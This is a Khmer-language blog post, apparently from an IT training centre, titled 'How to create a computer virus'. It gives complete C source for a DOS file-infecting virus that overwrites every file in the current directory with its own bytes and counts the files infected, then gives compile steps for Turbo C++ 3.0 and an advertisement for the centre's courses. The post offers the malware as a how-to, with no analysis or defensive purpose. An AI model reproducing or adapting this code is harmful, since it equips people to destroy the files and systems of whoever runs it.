របៀបបង្កើតមេរោគកុំព្យូទ័រ

របៀបបង្កើតមេរោគកុំព្យូទ័រ

aការសរសេរដោយប្រើកម្មវិធី C ដើម្បីសរសេរ និង compile ជាមេរោគ
ខាងក្រោមនេះប្រភពកូដ source code សរសេរក្នុង    កម្មវិធី C

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(”*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(”Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(”DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(”TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

វិធី Compile:
ដោយប្រើកម្មវិធី  TC++ 3.0 (16-BIT)
1. ចូលក្នុងកម្មវិធី compiler ដោយចុចលើ Alt-F9 ដើម្បី compile
2. ចុច F9 ដើម្បីបង្កើត EXE file (មិនចុចលើ CTRL-F9)
3. ប្តូរតម្លៃនៃ X ក្នុងប្រភពកូដ source code ជាមួយតម្លៃ x= 89088។
—————————————————————————–

មជ្ឈមណ្ឌល អាយធី ខេប៊ូ-IT CAMBO សរសេរកម្មវិធី:
– រចនាវ៉ិបសាយ & Hosting គ្រប់គ្រងក្រុមហ៊ុន…
– បង្កើតកម្មវិធីគ្រប់គ្រងទិន្នន័យ
– ដំឡើងប្រព័ន្ធ ណែតវឺក Networkingកម្មវិធីសិក្សាបើកវគ្គខ្លី(សិស្សចាប់ពី ១០ឡើងទៅ)
–  វគ្គរចនាវ៉ិបសាយ HTML,CSS, Javascript, PHP, ASP.NET
–  វគ្គដំឡើងកុំព្យូទ័រណែតវឺក Networking
–   វគ្គជួសជុលកុំព្យូទ័រ Computer Repairing
–   វគ្គសរសេរកម្មវិធីលើ iOS (កម្មវិធី iPhone, iPAD)

ទំនាក់ទំ​នង លោក ទាវ​ ឈុន ណន: 0977778647-077778647-070778647
Email: chhunnan@gmail.com
Chat: yahoo, skype: chhunnan
www.itcambo.com
ITCAMBO-NEW